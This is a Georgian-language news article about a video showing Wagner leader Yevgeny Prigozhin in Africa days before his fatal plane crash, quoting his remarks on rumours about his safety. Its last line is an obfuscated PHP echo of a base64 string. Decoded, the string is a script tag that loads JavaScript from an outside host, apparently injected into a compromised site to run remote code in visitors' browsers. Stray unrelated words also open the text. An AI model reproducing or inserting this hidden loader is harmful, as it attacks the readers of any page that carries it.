celsiusi
ავერსი საქკაბელი

 დღეს გამოქვეყნებულ ვიდეოში, “ვაგნერის” მოძრაობის ლიდერი ევგენი პრიგოჟინი გარდაცვალებამდე რამდენიმე დღით ადრე აფრიკაში ვიზიტისას ჩანს და საკუთარ კეთილდღეობასა და შესაძლო თავდასხმის საფრთხის სპეკულაციებზე საუბრობს.

Reuters-ის ცნობით, პრიგოჟინის ჩაცმულობა, ასევე საათი, რომელიც მარჯვენა ხელზე უკეთია, ემთხვევა მის აღწერილობას 21 აგვისტოს გამოქვეყნებულ ვიდეოში, რომელშიც პრიგოჟინი ასევე აფრიკაში ყოფნაზე მეტყველებს. რაც შეეხება “დასვენების დღეებს”, ეს ნიშნავს, რომ ვიდეო 19-20 აგვისტოს უნდა იყოს გადაღებული, 3-4 დღით ადრე, ვიდრე თავად პრიგოჟინი, “ვაგნერის” სხვა წევრები და დაცვა მოსკოვში ავიაკატასტროფას ემსხვერპლნენ.

“მათთვის, ვინც განიხილავს, ცოცხალი ვარ თუ არა და როგორ ვარ - ახლა დასვენების დღეებია, 2023 წლის აგვისტოს მეორე ნახევარი, მე აფრიკაში ვარ” - ამბობს პრიგოჟინი მოკლე ვიდეოში, რომელიც “ვაგნერის” ჯგუფთან დაკავშირებულ ტელეგრამ არხზე ვრცელდება.

“ასე რომ, ადამიანებისთვის, ვინც საუბრობენ ჩემს მკვლელობაზე, ჩემს პირად ცხოვრებაზე, რამდენს გამოვიმუშავებ და ასე შემდეგ - ყველაფერი კარგადაა”, - დასძინა მან და მაყურებელს დაემშვიდობა.

შეგახსენებთ, რომ “ვაგნერის” დაჯგუფება უკრაინის ომში რუსეთის მხარეს იბრძოდა, თუმცა პრიგოჟინის კრიტიკას, მოსკოვის თავდაცვითი შესაძლებლობისადმი, ივნისში ხანმოკლე ამბოხება მოჰყვა. კრემლი ავიაკატასტროფასთან კავშირს უარყოფს, თუმცა ვიდეოში პრიგოჟინის სიტყვები ცხადყოფს, რომ იგი სასიცოცხლო რისკებს აცნობიერებდა.

945
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");